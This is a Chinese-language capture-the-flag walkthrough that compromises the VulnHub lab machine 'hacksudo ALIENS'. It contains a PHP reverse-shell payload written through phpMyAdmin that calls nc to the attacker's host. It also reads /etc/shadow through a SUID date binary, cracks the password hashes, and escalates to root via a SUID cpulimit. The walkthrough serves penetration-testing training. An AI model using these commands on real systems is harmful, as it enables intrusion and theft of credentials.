靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-aliens,676/

名称: hacksudo系列ALIENS

靶场: VulnHub.com

难度: 简单

发布时间: 2021年4月4日

提示信息: 无

目标: user.txt和root.txt

实验环境

攻击机:VMware  kali    192.168.7.3

靶机:Vbox     linux   IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

扫描到靶机地址为192.168.7.122

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV -p- 192.168.7.122 -oN aliens.nmap

扫描到3个开放的端口22(SSH),80(HTTP)和9000(HTTP),先从80开始入手

Web渗透

访问80

http://192.168.7.122

是一个目击外星人数据的网站,未发现敏感信息,做个目录扫描

目录扫描

dirsearch -u http://192.168.7.122 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

扫描到2个目录,看看backup这个目录下面有什么

发现一个mysql备份文件,下载下来看看

wget http://192.168.7.122/backup/mysql.bak
cat mysql.bak

发现数据库帐号和密码

user=vishal
password=hacksudo

没有其他可利用的信息了,再来看看9000端口

http://192.168.7.122:9000

原来是phpMyAdmin(mysql数据库管理工具),用刚才获取到的帐号密码登录试试

phpMyAdmin写入shell

登录成功,试试有没有写权限,我们直接写个反弹shell的脚本

select "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 4444 >/tmp/f');?>" into outfile "/var/www/html/s.php"

写入成功,验证一下

反弹shell

kali攻击机监听4444端口

nc -lvvp 4444

web上执行payload

http://192.168.7.122/shell.php

反弹成功,切换完整的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xter
Ctrl+z

stty -a

stty raw -echo;fg
reset

stty rows 20 columns 82

切换完成,干正事,查找一切可利用的敏感信息

/var/backups目录下发现4个root权限的备份文件,但是没有权限查看,继续找

find / -perm -u=s -type f 2>/dev/null

发现个/usr/bin/date有s权限,我们可以利用这个命令读取文件

/usr/bin/date -f /etc/shadow

发现两个帐号有密码,把他们保存到kali攻击机上

vi passwd.txt

还需要处理一下格式,将前面多余的内容,和最后的单引号去掉

处理好了,现在开始暴破密码

john passwd.txt

拿到hacksudo帐号的密码aliens,登录ssh

ssh hacksudo@192.168.7.122

登录成功,找找可利用的敏感信息

/home/hacksudo/Desktop目录下找到user.txt

cd /home/hacksudo/Desktop
ls
cat user.txt

cpulimit提权

/home/hacksudo/Desktop目录下发现cpulimit文件有s权限

cd /home/hacksudo/Download
ls -al

这个程序是可以提权的

./cpulimit -l 100 -f -- /bin/sh -p

提权成功,查看最后一个flag

cd /root
ls -al
cat root.txt

OK,拿到root.txt,游戏结束